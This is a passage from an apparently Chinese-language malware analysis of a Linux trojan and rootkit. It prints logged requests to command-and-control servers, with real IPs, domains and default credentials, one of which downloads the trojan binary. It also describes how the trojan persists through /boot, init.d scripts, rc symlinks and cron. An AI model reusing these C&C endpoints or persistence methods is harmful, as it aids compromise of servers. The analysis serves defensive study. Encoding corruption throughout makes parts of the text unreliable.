request:
GET /compiler?iid=CE74BF62ACFE944B2167248DD0674977&username=admin
&password=admin&ip=103.25.9.245:8005%7C103.240.141.50:8005%7C
66.102.253.30:8005%7Cndns.dsaj2a1.org:8005%7Cndns.dsaj2a.org:8005%7C
ndns.hcxiaoao.com:8005%7Cndns.dsaj2a.com:8005
&ver=3.8.0-19-generic%5C%20SMP%5C%20mod_unload%5C%20modversions%5C%20686%5C%20
&kernel=3.8.0
reply:
1001|CE74BF62ACFE944B2167248DD0674977|header directory is exists!
第三個GET請求則是下載上一個請求之后服務器生成的木馬的二進制文件,請求的方式已經(jīng)非常明顯了,看包:
request:
GET /upload/module/CE74BF62ACFE944B2167248DD0674977/build.tgz
reply:
1001|CE74BF62ACFE944B2167248DD0674977|create ok
而以上的三個步驟僅僅是針對于感染機器的當前系統(tǒng)版本已經(jīng)包含在遠端服務器中的情況����。如果當然的操作系統(tǒng)版本信息并沒有包含其中��,那么腳本文件則會首先定位到內(nèi)核頭文件的/lib/modules/%s/build/目錄中(s%代表uname命令返回的特定信息)�,然后將內(nèi)核文件打包并上傳到C&C服務器上,這里上傳是用的mini這個程序�����。當然,對于一個產(chǎn)業(yè)化的木馬來說�����,這種情況是不多見的�,一般的發(fā)行版本的內(nèi)核都是已經(jīng)被提前編譯好的,這里所提及的操作系統(tǒng)的內(nèi)核信息不在C&C服務器中的情況大多是比較特殊的服務器����。
該rootkit組件是一個可裝載的內(nèi)核模塊(LKM)。在裝載之前�,需要通過vermagic的值檢查。如果繞過檢查失敗���,則該腳本會安裝一個木馬來替代rootkit組件�。
結(jié)構(gòu)和可持續(xù)性
主程序的二進制結(jié)構(gòu)如下圖所示:
該木馬的持續(xù)化的方式是通過多種方式進行的���。首先��,它將自己安裝在/boot/目錄下����,然后命名為一個包含10個字節(jié)的字符串。然后腳本將木馬以相同的名字在/etc/init.d/ 目錄下創(chuàng)建�,同時在/etc/rc%u.d/S90%s目錄建立五個符號鏈接,其中u%是1-5����,s%是一個隨機值。這樣保證每次重啟系統(tǒng)木馬可以隨時啟動起來���。而且,腳本還會對/etc/cron.hourly/cron.sh文件加入以下內(nèi)容:
小編推薦閱讀
